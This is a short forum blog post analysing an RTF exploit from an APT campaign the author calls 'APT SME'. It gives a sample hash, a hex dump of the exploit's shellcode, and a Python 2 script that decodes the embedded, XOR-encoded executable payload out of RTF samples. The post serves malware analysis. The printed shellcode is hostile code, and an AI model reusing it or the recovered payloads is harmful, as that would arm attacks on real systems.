View RSS Feed

w@rri0r@bh@y

Apt sme

Rating: 3 votes, 2.33 average.
Greet : "Vinnu", "nightrover","bond"

I have used name "APT SME " because payload developer have used the name for his project.I have just created automation to exctract payload file from the exploit used in APT SME.

Sample used for creating Automation:
Md5 - 57A8DB5A5D35464BE16518332A64A992

Shellcode:

Code:
e80000000081efb178fd9401f76681e6a9008b04248d7424186681cfa81d83c40181f782e7813383c40281e7e3000000446681eeb25e83e8056689ff66c1ef7905c00000006681e7bc00bb84feffffc1e66cf7db8d7c241883e20066c1e6f880e50001f680c5378d74242080c5b46601f666478a0883e76e01fe30e96681ce483df6c101751581f782e7813380c1016681cee476eb106681f7ecf181ce63af2725fec9c1e63bc1efed880866c1e74d83c2016629f783e8ff8d7c240439da75b1db238e619bda619ce6619cf66184e261acca61dc8cd3a2f29f1861afd661beef92eb006198caeb04db23ab47eb0261f2c1b2ee6b110fca37159f05a361b0ceeb018c61e6a161b0f6eb01e9c661bfdb318c6b2115e5a980e2b961aecee2153a6f2a9f0752a5a588886335459f02459f0f6bd54d4d31319f32bcbdb963146904e2537344e8ea522f77f66b5579ebeaeb1d0dd8ecac0813b1b5b4d747f370699f5a692deeb3bddb235c38546744e8ea60fd6a10ea9ee36a2ceed2189ee8da1862fdabadd31b9f02b58c53a7b08c63e5bddb238e619bda619ce6619cf66184e26194ca61dcd2a5f29f1901a3b58207d38bf0153d821515e5ea15dece82eaeaeeea153aefeafaeaeaba159eceeedb232deaeaeaeaea692bee692aee6b13ea7ae9ea9f06b4b553cfe6eaeabc6b2c8248e8eabd194e29025815151561afd661b6ef92eb0161a1f209d8a361a9caeb0261de62eb04db2a7346eb282b20e7a2931dd1beceee9f0b61a9ceeb028c61e6a261a9f6eb0261ee62eb026313b0b4b82900
Extractor :
Code:
import os, shutil,binascii


scan = os.getcwd() + "\\scan\\"
processed_file = os.getcwd() + "\\comp\\"
nocomp = os.getcwd() + "\\nocomp\\"
output = os.getcwd() + "\\output\\"

try:
    os.mkdir(processed_file)
    os.mkdir(nocomp)
    os.mkdir(output)
except:
    pass

samples = os.listdir(scan)

def mov_nocomp():
 try:
     shutil.move(os.path.join(scan,sample),os.path.join(nocomp,sample))
 except:
       pass

def mov_processed_file():
 try:
     shutil.move(os.path.join(scan,sample),os.path.join(processed_file,sample))
 except:
       pass


def decoder(rev):
        DH = 0x0D2
        comp = ""
        d = 0
        for j in range (0,len(rev),1):
            #print ord(rev[j])
            #print ord(rev[0x5d])
            if ord(rev[d]) == 0:
                #print d
                comp += rev[d]
               
            else:
                DH = DH + 0x4
                DH = DH % 0x100
                if ord(rev[d]) == DH:
                    comp += rev[d]
                else:
                    comp += chr(ord(rev[d]) ^ DH)
            d = d + 1
        return comp
       
def mov_hex(data):
        rev = ""
        a = 0
        b = 1
        c = ""
        #print data
        for i in range (0,len(data),2):
                c = data[a] + data[b]
                c = c.decode("hex")
                rev += c
                a = a + 2
                b = b + 2
        return rev
    

for sample in samples:
        file = open(scan+sample,"rb")
        file1 = file.read()
        file.close()

        if file1[:4] == "{\\rt":
            print "Processing_APT_SME" + sample
            found = file1.find("4f4f6262")
            print found
            if found > -1:
                data = file1[found+26:found + 0x58398]
                data = data.replace("\r\n","")
                rev = mov_hex(data)
                comp = decoder(rev)
                comp = "MZ" + comp[2:0x2a268]
                fil = open(output+sample+".exe_","wb")
                fil.write(comp)
                fil.close()
                mov_processed_file()
            else:
                mov_nocomp()
        else:
            mov_nocomp()

Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y

Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: